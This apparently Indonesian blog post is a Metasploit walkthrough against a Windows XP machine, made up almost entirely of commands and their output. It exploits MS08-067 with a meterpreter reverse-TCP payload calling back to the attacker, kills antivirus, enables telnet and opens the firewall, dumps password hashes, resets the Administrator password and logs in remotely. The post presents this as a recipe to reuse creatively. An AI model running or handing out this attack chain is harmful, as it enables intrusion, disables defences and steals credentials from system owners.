Home > Networking > metasploit meterpreter quiet, telnet

metasploit meterpreter quiet, telnet

berikut, exploit, backdoor, dan telnet

1 msf > use exploit/windows/smb/ms08_067_netapi
2 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
3 PAYLOAD => windows/meterpreter/reverse_tcp
4 msf exploit(ms08_067_netapi) > set LHOST 192.168.1.45
5 LHOST => 192.168.1.45
6 msf exploit(ms08_067_netapi) > set RHOST 192.168.1.200
7 RHOST => 192.168.1.200

exploit

1 msf exploit(ms08_067_netapi) > exploit -f
2
3 [*] Started reverse handler on 192.168.1.45:4444
4 [*] Automatically detecting the target...
5 [*] Fingerprint: Windows XP Service Pack 3 - lang:English
6 [*] Selected Target: Windows XP SP3 English (NX)
7 [*] Attempting to trigger the vulnerability...
8 [*] Sending stage (748032 bytes) to 192.168.1.200
9 [*] Meterpreter session 1 opened (192.168.1.45:4444 -> 192.168.1.200:1913)

kill av, get telnet

1 meterpreter > run killav
2 [*] Killing Antivirus services on the target...
3 [*] Killing off cmd.exe...
4 meterpreter > run gettelnet -e
5 [*] Windows Telnet Server Enabler Meterpreter Script
6 [*] Setting Telnet Server Services service startup mode
7 [*]     The Telnet Server Services service is not set to auto, changing it to auto ...
8 [*]     Opening port in local firewall if necessary

kalo ada account selain Administrator,

1 meterpreter > hashdump
2 Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
3 Ray16:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
4 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
5 HelpAssistant:1000:7d006c3deefcb55524e896ae900db85e:3c877a4ddf86e32f4c1e5b36217db268:::
6 SUPPORT_388945a0?:1002:aad3b435b51404eeaad3b435b51404ee:77d358f2c00b3af0f58f110c778d7f05:::

execute, interact

1 meterpreter > execute -f cmd.exe -c
2 Process 6220 created.
3 Channel 8 created.
4 meterpreter > interact 8
5 Interacting with channel 8...

Set password Administrator ke “password”

1 C:\WINDOWS>net user Administrator password
2 net user Administrator password
3 The command completed successfully.

23, telnet aktif

1 root@bt:~# nmap -p 23 192.168.1.200
2
3 Starting Nmap 5.00 ( http://nmap.org ) at 2010-04-06 07:37 UTC
4 Interesting ports on 192.168.1.200:
5 PORT   STATE SERVICE
6 23/tcp open telnet
7 MAC Address: 00:1F:C6:0B:1A:A1 (Asustek Computer)
8
9 Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds

go telnet

01 root@bt:~# telnet 192.168.1.200
02 Trying 192.168.1.200...
03 Connected to 192.168.1.200.
04 Escape character is '^]'.
05 Welcome to Microsoft Telnet Service
06
07 login: Administrator
08 password:
09
10 *===============================================================
11 Welcome to Microsoft Telnet Server.
12 *===============================================================
13 C:\>

metasploit tool powerful, tinggal kreatifitas aja..
http://ray16.info/~me/?p=589

Categories: Networking
  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: